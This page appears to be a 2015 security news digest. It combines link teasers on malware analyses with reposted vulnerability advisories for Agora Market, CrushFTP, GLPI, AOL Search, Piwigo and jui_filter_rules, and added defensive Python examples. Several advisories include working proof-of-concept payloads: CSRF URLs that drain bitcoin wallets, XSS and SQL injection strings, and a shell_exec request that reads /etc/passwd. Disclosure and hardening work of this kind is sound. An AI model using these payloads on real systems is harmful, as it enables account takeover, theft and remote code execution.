Channel: BOT24

Windows: CreateProcessAsUser Impersonation Token Bypass

The CreateProcessAsUser function is implemented by passing a token handle via a special attribute (value 0x60002) to the underlying NtCreateUserProcess system call. All documentation indicates that this handle should be a primary token; the CreateProcessAsUser function will attempt to duplicate the token if necessary to make a primary token. The particular issue in this case is that NtCreateUserProcess and the functions it calls, such as PspReferenceTokenForNewProcess and SeAssignPrimaryToken, never verify that it is a primary token. The only requirement on the token is that the handle is opened with TOKEN_ASSIGN_PRIMARY_TOKEN privilege, which any impersonation token is granted.

more here..........https://code.google.com/p/google-security-research/issues/detail?id=198

Whitelisting goes wrong

Last December, I did testing on one of the client's web applications. I'm going to share one of the findings that, for me, was quite interesting.

This application is used specifically for a state mapping service. A user can view the updated geoportal of their state by browsing to this application.


more here...........http://c0rni3sm.blogspot.com/2015/02/whitelisting-goes-wrong.html

[ TECHNICAL ANALYSIS: SCOOP.APK ]

I started to write about this particular malware before Christmas in 2014, but it was left sitting in the drafts for so long, until I decided to take a break from #EquationAPT today. It all started when I got an SMS

more here..........http://www.vxsecurity.sg/2015/02/18/technical-analysis-scoop-apk/

Another hunting post

I often see statements like “people need to know their network like the back of their hand to be able to identify evil”. While I don’t disagree with this, I think there are many other things that people should be just as familiar with. Sally’s machine in finance may not always scan Jim’s machine in R&D and the clues to identifying a compromise may be much more subtle. It’s these subtle indicators that we can use to hunt for adversary activity.

more here........http://blog.handlerdiaries.com/?p=775

Shooting Elephants: (Analysis of French Government Spyware Known As Babar Which Steals Data from Instant Messengers, Softphones, Browsers and Office Applications)

The subject of this analysis is a fascinating piece of malware, which invades Windows desktop machines and aims at..well, all the things. The analyzed malware consists of a dropper and an implant, which invades Windows processes to steal data from instant messengers, softphones, browsers and office applications. A fully blown espionage kit, so to say, sophisticated almost. The implant is able to hook APIs of interest in dedicated remote processes, to steal data on the fly.

More interesting than the malware itself though, is the path to the associated symbol file, which appears embedded in the dropper.

more here...........https://drive.google.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/view?pli=1


and an article on the topic by Motherboard here...http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france

Angry Android hacker hides Xbot malware in popular application icons

In the past few weeks, the Avast Mobile Security analysts have been focusing on Android malware which targets users in Russia and Eastern Europe. One of the families that caught our interest was the Xbot malware.

The name Xbot comes from the sample itself as the string Xbot was found in all variants of this malware. Xbot uses a variety of names and package names but this string was, with different levels of obfuscation, in every single file we analyzed so we decided to name the malware after it.

more here.......https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/

Did GCHQ illegally spy on you? Here’s how to find out

Want to know if UK intelligence agency GCHQ has been covertly spying on you? Now here’s your chance.
Surveillance and privacy watchdog Privacy International has launched an initiative to help people discover if their internet activity and private communications were secretly and illegally spied upon by British intelligence outfit, GCHQ.

more here.........http://www.welivesecurity.com/2015/02/17/gchq-illegally-spy/

Agora Marketplace CSRF to Steal Bitcoins (agorahooawayyfoe.onion)- The Guardians of Peace Aims to Disclose Vulnerabilities in Onion Land

Ladies and gentlemen,
Boys and girls,
It has come to our attention that a brave warrior for the people, Ross William Ulbricht, was unlawfully convicted by the corporation known as the American government.

This mockery of justice has not gone unnoticed.

In order to protect the next generation of darknet markets we will be
disclosing vulnerabilities for these sites in order to make these
sites safer from attack.

To start, the Agora Marketplace contains a CSRF vulnerability which
can be used to drain a victim account of all of their Bitcoins. The
following URLs can be used to perform this attack:

URL to start PIN reset:
http://agorahooawayyfoe.onion/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=

URL to change current PIN:
http://agorahooawayyfoe.onion/resetpin?pin1=1337&pin2=1337&submit=Save

URL to send bitcoins using the new pin:
http://agorahooawayyfoe.onion/sendbitcoins?targetaddress=[YOUR_BTC_ADDY]&withdrawschedule=0&targetamount=1&walletpin=1337&submit=Send

These are all GET requests and don't require JavaScript to work.
NoScript cannot save you from poor coding practices.

There will be more to come. Stay safe. Stay anonymous.

-The Guardians of Peace

Email: agoraagoraagora@hushmail.com
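Added example (Python, not part of the post and not Agora's code): a constructed toy wallet that replays the three quoted URLs against the design the post describes (every action a GET, the session cookie the only check) and against a hardened version that accepts state changes only as POSTs carrying a session-bound synchronizer token. WalletApp, its endpoint internals, the balance and the PIN are all assumptions made for the example.

```python
import hashlib
import hmac
import os
from urllib.parse import parse_qs, urlsplit

# The three URLs quoted in the post, replayed in order against the toy wallet.
CHAIN = [
    "http://agorahooawayyfoe.onion/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=",
    "http://agorahooawayyfoe.onion/resetpin?pin1=1337&pin2=1337&submit=Save",
    "http://agorahooawayyfoe.onion/sendbitcoins?targetaddress=[YOUR_BTC_ADDY]&withdrawschedule=0&targetamount=1&walletpin=1337&submit=Send",
]


class WalletApp:
    """Constructed toy wallet, not Agora's code. strict=False reproduces the design
    the post describes: every action is a GET whose only authentication is the
    session cookie. strict=True is the hardened shape: state changes must be POSTs
    carrying a per-session synchronizer token in the request body."""

    def __init__(self, strict):
        self.strict = strict
        self.secret = os.urandom(32)
        self.users = {"sid-victim": {"pin": "4242", "reset_pending": False, "balance": 5}}

    def csrf_token(self, sid):
        # Bound to the session; a page on another origin cannot read it.
        return hmac.new(self.secret, sid.encode(), hashlib.sha256).hexdigest()

    def handle(self, method, url, cookies, form=None):
        sid = cookies.get("session")
        if sid not in self.users:
            return 401, "no session"
        acct = self.users[sid]
        parts = urlsplit(url)
        if self.strict:
            # Hardened: no side effects on GET, and the token must come from the
            # body (never the query string, which the link author controls).
            if method != "POST":
                return 405, "state-changing request must be POST"
            token = (form or {}).get("csrf", "")
            if not hmac.compare_digest(token, self.csrf_token(sid)):
                return 403, "missing or invalid CSRF token"
            params = form
        else:
            # Vulnerable: parameters straight from the URL, cookie is the only check.
            params = {k: v[0] for k, v in parse_qs(parts.query).items()}
        return self._dispatch(parts.path, params, acct)

    @staticmethod
    def _dispatch(path, params, acct):
        if path == "/startresetpin":
            acct["reset_pending"] = True
            return 200, "pin reset started"
        if path == "/resetpin":
            if not acct["reset_pending"] or params.get("pin1") != params.get("pin2"):
                return 400, "no reset pending or pins differ"
            acct["pin"] = params["pin1"]
            acct["reset_pending"] = False
            return 200, "pin changed"
        if path == "/sendbitcoins":
            if params.get("walletpin") != acct["pin"]:
                return 403, "wrong wallet pin"
            amount = int(params.get("targetamount", "0"))
            if amount <= 0 or amount > acct["balance"]:
                return 400, "bad amount"
            acct["balance"] -= amount
            return 200, "sent %d to %s" % (amount, params.get("targetaddress"))
        return 404, "unknown action"


def replay_cross_site_chain(app):
    """What the victim's browser does when another site embeds the three URLs:
    plain GETs with the session cookie attached automatically, no script involved."""
    cookies = {"session": "sid-victim"}
    statuses = [app.handle("GET", url, cookies)[0] for url in CHAIN]
    return statuses, app.users["sid-victim"]["balance"]


def legitimate_send(app):
    """A same-origin form post that carries the token still works in strict mode."""
    cookies = {"session": "sid-victim"}
    form = {"csrf": app.csrf_token("sid-victim"), "targetaddress": "bc1-example",
            "targetamount": "1", "walletpin": "4242"}
    status, _ = app.handle("POST", "https://wallet.example/sendbitcoins", cookies, form)
    return status, app.users["sid-victim"]["balance"]
```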

Crushftp 7.2.0 - Multiple CSRF & XSS Vulnerabilities

========================================================
I. Overview
========================================================
Multiple CSRF & Cross-Site Scripting (XSS) vulnerabilities have been identified in
Crushftp 7.2.0 (Web Interface) in its default configuration. These vulnerabilities allow
an attacker to gain control over valid user accounts, perform operations
on their behalf, redirect them to malicious sites, steal their credentials,
and more.
========================================================
II. Severity
========================================================
Rating: Medium
Remote: Yes
Authentication Required: Yes
========================================================
III. Vendor's Description of Application
========================================================
CrushFTP is a robust file transfer server that makes it easy to setup secure connections with your users.
'Crush' comes from the built-in zip methods in CrushFTP. They allow for downloading files in compressed formats in-stream,
or even automatically expanding zip files as they are received in-stream. This is called ZipStreaming and can greatly accelerate
the transfer of many types of files.
Secure management is web based allowing you the ability to manage and monitor the server from anywhere, or with almost any device.
Easy in place server upgrades without complicated installers. Runs as a daemon, or Windows service with no need for a local GUI.
CrushFTP is watching out for you by detecting common hack attempts and robots which scan for weak passwords. It will automatically
protect you against DDoS attacks. No need for you to do anything as CrushFTP will automatically ban these IPs to prevent wasted logging and CPU usage.
This keeps your server secure from unwanted abuse.
User management includes inheritance, groups, and virtual file systems. If you want simple user management,
it can be as easy as just making a folder with a specific name and nothing else.
Think about how easily you can delegate user administration with CrushFTP's role based administration and event configuration.
http://www.crushftp.com/index.html

========================================================
IV. Vulnerability Details & Exploit
========================================================

1) Multiple CSRF Vulnerabilities (Web Management interface - Default Config)

a) An attacker may add/delete/modify user accounts
b) An attacker may change all configuration settings

Request Method: POST
Location: /WebInterface/function/

Proof of Concept:

2) Multiple Cross-Site Scripting (Web Interface - Default Config)

Type: Reflected
Request Method: POST
Location: /WebInterface/function/
Parameter: vfs_items
Values:
vfs_items =


Proof of Concept:

POST /WebInterface/function/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:8080/WebInterface/UserManager/index.html
Content-Length: 656
Cookie: XXXXXXXXXXXXXXXXXXXXX
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

command=setUserItem&data_action=new&serverGroup=MainUsers&username=test&user=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cuser+type%3D%22properties%22%3E%3Cusername%3Etest2%3C%2Fusername%3E%3Cpassword%3Etest2%3C%2Fpassword%3E%3Cmax_logins%3E0%3C%2Fmax_logins%3E%3Croot_dir%3E%2F%3C%2Froot_dir%3E%3C%2Fuser%3E&xmlItem=user&vfs_items=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cvfs+type%3D%22properties%22%3E%3C%2Fvfs%3E&permissions=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cpermissions+type%3D%22properties%22%3E%3Citem+name%3D%22%2F%22%3E(read)(view)(resume)%3C%2Fitem%3E%3C%2Fpermissions%3E


Type: Reflected
Request Method: GET
Location: /WebInterface/function/
Parameter: path
Values:

Authored by Rehan Ahmed
Email: knight_rehan@hotmail.com

Tracking down a segfault in grep

I was happily tooling around on my MacBook at the command line, poking around in the MAME source code as you do, and then this happened:

$ grep -f pats listing
704 ./powerpc
724 ./m68000
872 ./i386
1092    ./upd7810
Segmentation fault: 11

Record scratching sound. WTF.

more here............http://blog.loadzero.com/blog/tracking-down-a-segfault-in-grep/

Multiple vulnerabilities on GLPI

Multiple vulnerabilities have been identified in GLPI (http://www.glpi-project.org).

1/ Arbitrary file upload
Severity: Important

Versions Affected
===========
All versions between 0.85 and 0.85.2

Description
=======
When a user wants to create a new ticket, they have the option to add an attachment. If, for example, they add a file named "test.php", with or without submitting the ticket, the file will be temporarily uploaded to GLPI_ROOT/files/_tmp/test.php. We can then directly access this file through http://host/GLPI_ROOT/files/_tmp/test.php and by default the PHP code will be interpreted.

To trigger this vulnerability we need an account that has the right to create a ticket.

This vulnerability is a combination of three issues:
- predictable uploaded file names (not randomized)
- upload of unauthorized file extensions
- temporarily uploaded files are not deleted when the file extension is unauthorized.

Impact
=====
By uploading a PHP file that will be interpreted, a malicious user would be able to execute arbitrary code on the server.

Mitigation
======
Upgrade to GLPI 0.85.3 (https://forge.indepnet.net/issues/5217)


==========


2/ Privilege escalation
Severity: Important

Versions Affected
===========
All versions <= 0.85.2

Description
=======
Take the default account "tech": it is only allowed to add users to the following groups: Self-Service, Technician. It has no rights over, for example, the super-admin group, so it cannot grant super-admin privileges to an existing user.

The problem arises when creating a new user. When intercepting the POST request (GLPI_ROOT/front/user.form.php) of a user creation and modifying the _profiles_id parameter (corresponding to the group attached to the user) to 4, the new user will have super-admin privileges.

Impact
=====
Any user who has the rights to create a new user can create a super-admin user.

Mitigation
======
Upgrade to GLPI 0.85.3 (https://forge.indepnet.net/issues/5218)

Regards,
--
Peter STIEHL
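Added example (Python, not GLPI's code and not part of the advisory) covering both findings: an upload handler that removes all three ingredients of the first issue (extension checked before anything is written, random stored name, nothing left behind on rejection) and a server-side check for the second, where the requested _profiles_id is validated against what the acting account may grant. The extension allowlist, the profile ids 1 and 6, and the temp directory layout are assumptions; only profile id 4 (super-admin) comes from the advisory.

```python
import os
import secrets
import tempfile

# Constructed allowlist of attachment extensions; GLPI's real list is not on this page.
ALLOWED_EXTENSIONS = {"png", "jpg", "pdf", "txt"}

# Profiles the default "tech" account may grant, keyed by profile id. Ids 1 and 6
# are placeholders; the advisory only states that id 4 is super-admin.
TECH_ASSIGNABLE_PROFILES = {1: "Self-Service", 6: "Technician"}
SUPER_ADMIN_PROFILE_ID = 4


class UploadRejected(Exception):
    pass


def store_attachment(tmp_dir, original_name, data):
    """Hardened counterpart of the _tmp upload step: the extension is checked
    before anything touches disk, so a rejected test.php is never written (and
    so never left behind), and accepted files get an unguessable name."""
    base = os.path.basename(original_name.replace("\\", "/"))
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension %r is not allowed" % ext)
    stored = "%s.%s" % (secrets.token_hex(16), ext)
    path = os.path.join(tmp_dir, stored)
    # O_EXCL: fail rather than overwrite if the name already exists; 0600: owner only.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return stored


def simulate_ticket_upload(original_name, data=b"<?php echo 'x'; ?>"):
    """Runs one upload against a fresh temp dir and reports what the request
    left on disk: (accepted, stored_name, files_present_afterwards)."""
    with tempfile.TemporaryDirectory() as tmp:
        try:
            stored = store_attachment(tmp, original_name, data)
            accepted = True
        except UploadRejected:
            stored, accepted = None, False
        leftover = sorted(os.listdir(tmp))
    return accepted, stored, leftover


def profile_for_new_user(actor_assignable, requested_profile_id):
    """Server-side check for _profiles_id: the acting account may only hand out
    profiles it is itself allowed to grant, whatever the POST body says."""
    try:
        requested = int(requested_profile_id)
    except (TypeError, ValueError):
        raise PermissionError("_profiles_id must be an integer")
    if requested not in actor_assignable:
        raise PermissionError("profile %d is not assignable by this account" % requested)
    return requested
```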

Use-After-Free in VLC 2.1.x

tldr; I found a vulnerability in VLC while creating a training course on fuzzing. I reported it to the VLC maintainers but they declined to fix it. I contend it’s a security vulnerability. Here is the evidence, you decide.

more here...........http://theelectronjungle.com/2015/02/15/use-after-free-in-vlc-2.1.x/

Reflected File Download in AOL Search Website

Oren Hafif reported a new kind of attack called Reflected File Download (https://www.blackhat.com/eu-14/briefings.html#reflected-file-download-a-new-web-attack-vector) at the Black Hat Europe 2014 conference. More details about the attack can be found in his public presentation: https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf

Google and Bing have already fixed the vulnerability, but I've found the same vulnerability in the AOL Search website. A malicious user could send the link below to a victim, who would then download a malicious batch file from the autocomplete.search.aol.com domain. In the link below we search for 'iramar "||calc||' using the AOL autocomplete domain. The browser will encode the double quote, but the server will escape it (\") and return it inside the JSON in the response body. Since the response has the header "Content-Type: application/x-suggestions+json;charset=UTF-8", the browser will automatically try to download the reflected file. Chrome didn't try to download the file, but Internet Explorer and Firefox will.

http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar"||calc||&it=ws-landing&dict=en_us_search&count=8&output=json

REQUEST

GET http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar%22||calc||&it=ws-landing&dict=en_us_search&count=8&output=json HTTP/1.1

Host: autocomplete.search.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ...
Connection: keep-alive


RESPONSE

HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 10:30:34 GMT
Server: Apache-Coyote/1.1
Content-Type: application/x-suggestions+json;charset=UTF-8
Content-Language: en-US
Content-Length: 24
Keep-Alive: timeout=5, max=10
Connection: Keep-Alive

["iramar\"||calc||", []]
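Added example (Python, not part of the post and not AOL's code): a checker for the three ingredients of a Reflected File Download, run over the request and response shown above, beside a hardened responder for the same suggestion payload (fixed download name via Content-Disposition, nosniff, and \uXXXX-escaping of every non-alphanumeric character in reflected input). The inline-type set is a heuristic assumption, and the exchange is re-typed as constructed input.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# The exchange from the post, re-typed as constructed input (the '*' bold markers
# of the email are dropped; cookie and most headers omitted).
REQUEST_LINE = ("GET http://autocomplete.search.aol.com/autocomplete/get;calc.bat"
                "?q=iramar%22||calc||&it=ws-landing&dict=en_us_search&count=8&output=json HTTP/1.1")
RESPONSE_HEADERS = {"Content-Type": "application/x-suggestions+json;charset=UTF-8",
                    "Content-Length": "24"}
RESPONSE_BODY = '["iramar\\"||calc||", []]'

# Heuristic (assumption): types a browser renders in the window rather than saving.
INLINE_TYPES = {"text/html", "text/plain", "image/png", "image/jpeg", "image/gif"}
SHELL_META = re.compile(r'[|&;<>"]')


def rfd_findings(request_line, headers, body, reflected_param="q"):
    """Checks the three ingredients of a Reflected File Download and returns
    one string per ingredient found; an empty list means none of them holds."""
    parts = urlsplit(request_line.split()[1])
    findings = []
    # 1. The link author chooses the saved file's name through a ";name.ext"
    #    path parameter that the server ignores when routing.
    last_segment = parts.path.rsplit("/", 1)[-1]
    if ";" in last_segment:
        findings.append("caller-chosen filename in path: " + last_segment.split(";", 1)[1])
    # 2. The body is not rendered inline and no Content-Disposition pins a
    #    fixed, harmless filename, so the name from (1) wins.
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype not in INLINE_TYPES and "filename=" not in headers.get("Content-Disposition", ""):
        findings.append("download-prone type %s without a fixed filename" % ctype)
    # 3. Caller input comes back with shell metacharacters intact. JSON's \" is
    #    undone before comparing because it protects nothing once the body is
    #    saved as a .bat file.
    sent = parse_qs(parts.query).get(reflected_param, [""])[0]
    if sent and SHELL_META.search(sent) and sent in body.replace('\\"', '"'):
        findings.append("input %r reflected with shell metacharacters intact" % sent)
    return findings


def accept_path(path, expected="/autocomplete/get"):
    """Route check: only the exact endpoint path, no path parameters or path info."""
    return path == expected


def _json_string(s):
    # Every character outside ASCII letters/digits becomes a \uXXXX escape, which
    # JSON parsers decode transparently but no shell or batch interpreter will.
    out = []
    for c in s:
        if c.isascii() and c.isalnum():
            out.append(c)
        elif ord(c) < 0x10000:
            out.append("\\u%04x" % ord(c))
        else:
            out.append(json.dumps(c)[1:-1])  # surrogate pair from the stdlib encoder
    return '"' + "".join(out) + '"'


def hardened_suggestion_response(query, suggestions):
    """Same payload shape as the AOL reply, with the RFD mitigations applied."""
    body = "[%s, %s]" % (_json_string(query), json.dumps(suggestions))
    headers = {
        "Content-Type": "application/json;charset=UTF-8",
        # A fixed name: if a browser does save the response, it saves suggestions.json.
        "Content-Disposition": 'attachment; filename="suggestions.json"',
        "X-Content-Type-Options": "nosniff",
        "Content-Length": str(len(body.encode("utf-8"))),
    }
    return headers, body


def decode_body(body):
    """Parses a response body as JSON, to show the escaping is lossless."""
    return json.loads(body)
```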



More on Babar: espionage software finally found and put under the microscope by G DATA

Almost a year after Operation SNOWGLOBE was publicly mentioned for the first time by the famous French newspaper Le Monde, security experts have now laid hands on malware samples that match the descriptions made by the Communication Security Establishment Canada (CSEC). The following analysis is the first report about the espionage malware dubbed Babar, which the whole computer security community searched for. After the disclosure about EvilBunny [1], Babar is now a second component identified to be related to Operation SNOWGLOBE and is believed to be coded by the same developers. Babar’s feature set includes keystroke logging, clipboard logging and, most interesting, the possibility to log audio conversations – the elephant has big ears!

more here.........https://blog.gdatasoftware.com/blog/article/babar-espionage-software-finally-found-and-put-under-the-microscope.html

Initially Posted A Little Less Than a Year Ago "An Exploration of ARM TrustZone Technology" Is A Good Technical Read

ARM TrustZone technology has been around for almost a decade. It was introduced at a time when the controversial discussion about trusted platform-modules (TPM) on x86 platforms was in full swing (TCPA, Palladium). Similar to how TPM chips were meant to magically make PCs "trustworthy", TrustZone aimed at establishing trust in ARM-based platforms. In contrast to TPMs, which were designed as fixed-function devices with a predefined feature set, TrustZone represented a much more flexible approach by leveraging the CPU as a freely programmable trusted platform module. To do that, ARM introduced a special CPU mode called "secure mode" in addition to the regular normal mode, thereby establishing the notions of a "secure world" and a "normal world".

more here.........http://genode.org/documentation/articles/trustzone

Reflecting XSS- and SQL injection-vulnerabilities in the administrative backend of Piwigo

Advisory: Reflecting XSS- and SQL Injection vulnerability in CMS Piwigo <= v. 2.7.3
Advisory ID: SROEADV-2015-06
Author: Steffen Rösemann
Affected Software: CMS Piwigo <= v. 2.7.3 (Release date: 9th January 2015)
Vendor URL: http://piwigo.org
Vendor Status: patched
CVE-ID: -

==========================
Vulnerability Description:
==========================

Piwigo <= v. 2.7.3 suffers from a reflecting XSS and a SQL injection in its
administrative backend.

==================
Technical Details:
==================

The reflecting XSS vulnerability resides in the "page" parameter used in
the file admin.php which can be found in the administrative backend located
here in a common Piwigo installation:

http://{TARGET}/admin.php?page=plugin-AdminTools

Exploit-Example:

http://{TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E

The SQL injection vulnerability is also in the administrative backend, in the "History" functionality located here:

http://{TARGET}/admin.php?page=history

The SQL injection vulnerability can be exploited by appending arbitrary SQL
statements in a POST request to the parameter "user":

Exploit-Example:

POST /piwigo/admin.php?page=history HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/piwigo/admin.php?page=history&search_id=82
Cookie: pwg_display_thumbnail=no_display_thumbnail;
pwg_id=19rpao6bhdsn3l0u0o1im4m680;
_pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532.
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 255

start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2)
AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 --
&image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit

=========
Solution:
=========

Install the latest version 2.7.4 (released 17th February 2015).


====================
Disclosure Timeline:
====================
08-Jan-2015 - found the vulnerability
09-Jan-2015 - informed the developers
09-Jan-2015 - release date of this security advisory [without technical details]
09-Jan-2015 - vendor responded, will work on a patch (released in v. 2.7.4)
17-Feb-2015 - vendor releases patch 2.7.4 (see [3])
17-Feb-2015 - release date of this security advisory
17-Feb-2015 - sent to FullDisclosure

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://piwigo.org
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html
[3] http://piwigo.org/forum/viewtopic.php?id=25179
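Added example (Python with SQLite, not Piwigo's code and not part of the advisory): the "user" filter of the History page built by string pasting, as the advisory's payload implies, beside the fixed form that validates the value as a numeric id and binds it as a parameter, plus an allowlist check for the "page" parameter of admin.php. The history table schema is constructed, and the payload's MySQL-only functions are swapped for SQLite equivalents so the block runs offline.

```python
import re
import sqlite3

# The "user" value from the advisory's POST body, with the MySQL-only functions
# (user(), database(), version()) swapped for SQLite equivalents so it runs here.
ADVISORY_USER_PAYLOAD = "2) AND 1=2 UNION SELECT 'injected', sqlite_version(), 3 --"

# Identifier shape for the "page" parameter (assumption: plugin/page names only).
PAGE_NAME = re.compile(r"^[A-Za-z0-9_\-]+$")


def make_db():
    """Constructed stand-in for Piwigo's history table (schema is not on this page)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE history (id INTEGER, image_id INTEGER, user_id INTEGER)")
    db.executemany("INSERT INTO history VALUES (?, ?, ?)",
                   [(1, 101, 2), (2, 102, 2), (3, 103, 5)])
    return db


def history_rows_vulnerable(db, user):
    # The pattern the advisory implies: the user filter is pasted into the SQL text,
    # so a value beginning with "2)" closes the bracket and continues the query.
    sql = "SELECT id, image_id, user_id FROM history WHERE (user_id = %s) ORDER BY id" % user
    return db.execute(sql).fetchall()


def history_rows_fixed(db, user):
    """Fixed: the value must be an integer and travels as a bound parameter,
    never as SQL text; the same payload is rejected before any query runs."""
    if not re.fullmatch(r"[0-9]+", user):
        raise ValueError("user must be a numeric id")
    sql = "SELECT id, image_id, user_id FROM history WHERE (user_id = ?) ORDER BY id"
    return db.execute(sql, (int(user),)).fetchall()


def admin_page_name(page):
    """The "page" parameter of admin.php names a plugin or page; anything outside
    that character set (such as an <img ...> tag) is refused rather than echoed
    into the HTML."""
    if not PAGE_NAME.fullmatch(page):
        raise ValueError("invalid page name")
    return page
```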

PHP Code Execution in jui_filter_rules Parsing Library

PHP Code Execution in jui_filter_rules Parsing Library
======================================================
Researcher: Timo Schmid <tschmid@ernw.de>


Description
===========
jui_filter_rules[1] is a jQuery plugin which allows users to generate a ruleset which could be used to filter datasets inside a web application.

The plugin also provides a PHP library to turn the user submitted ruleset into SQL where statements for server side filtering. This PHP library contains a feature which allows the submitted filter values to be converted with server side functions. These functions can be specified within the ruleset, which leads to arbitrary PHP code execution.


Exploitation Technique
======================
Remote


Severity Level
==============
Critical


CVSS Base Score
===============
6.8 (AV:N / AC:M / Au:N / C:P / I:P / A:P)


CVE-ID
======
<unassigned>


Impact
======
By using the provided rule parsing library to generate SQL statements, an attacker is capable of executing arbitrary PHP code in the context of the web server. This could lead to a full compromise of the web server. The attack vector could be limited by existing validation mechanisms around the library, but this would require a partial manual parsing of the user supplied rules.


Status
======
Reported


Vulnerable Code Section
=======================
server_side/php/jui_filter_rules.php:
[...]
private function create_filter_value_sql($filter_type, $operator_type, ...
[...]
    if(is_array($filter_value_conversion_server_side)) {
        // function name and argument list are taken verbatim from the submitted ruleset
        $function_name = $filter_value_conversion_server_side['function_name'];
        $args = $filter_value_conversion_server_side['args'];
        $arg_len = count($args);
        for($i = 0; $i < $vlen; $i++) {
            // create arguments values for this filter value
            $conversion_args = array();
            for($a = 0; $a < $arg_len; $a++) {
                if(array_key_exists('filter_value', $args[$a])) {
                    array_push($conversion_args, $a_values[$i]);
                }
                if(array_key_exists('value', $args[$a])) {
                    array_push($conversion_args, $args[$a]['value']);
                }
            }
            // execute user function and assign return value to filter value
            // (no whitelist: any callable name reachable by call_user_func_array runs)
            try {
                $a_values[$i] = call_user_func_array($function_name, $conversion_args);
            } catch(Exception $e) {
                $this->last_error = array(
                    'element_rule_id' => $element_rule_id,
                    'error_message' => $e->getMessage()
                );
                break;
            }
        }
    }
[...]

The provided PHP parsing library allows the caller to specify a PHP function to convert the supplied filter value on the server side. This ultimately leads to code execution through attacker supplied input. As no whitelist approach is used, any existing PHP function could be executed (including shell commands).


Proof of Concept
================
Using the demo application from the git repository:

Executing shell_exec('cat /etc/passwd')

Request:
POST /ajax_create_sql.dist.php HTTP/1.0
host: http://www.example.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 471

a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=she
ll_exec&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=&a_rules%5B0%5D%5Bfilte
r_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpas
swd&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_
ps=yes&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field&a_rules%5B0%5D%5Bco
ndition%5D%5Boperator%5D=equal&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=d
ate

Response:
HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 02:12:33 GMT
Server: Apache/2.2.22 (Debian)
Content-Length: 530
Content-Type: text/html

{"sql":"WHERE \nsome_field = ?","bind_params":"root:x:0:0:admin
COSMOS:/root:/
bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\ns
ys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:ga
mes:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/va
r/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/s
pool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:pr
oxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh"}



Solution
========
This functionality should generally be removed or replaced by a mapping/whitelist approach and strict type filtering to prevent arbitrary code execution.
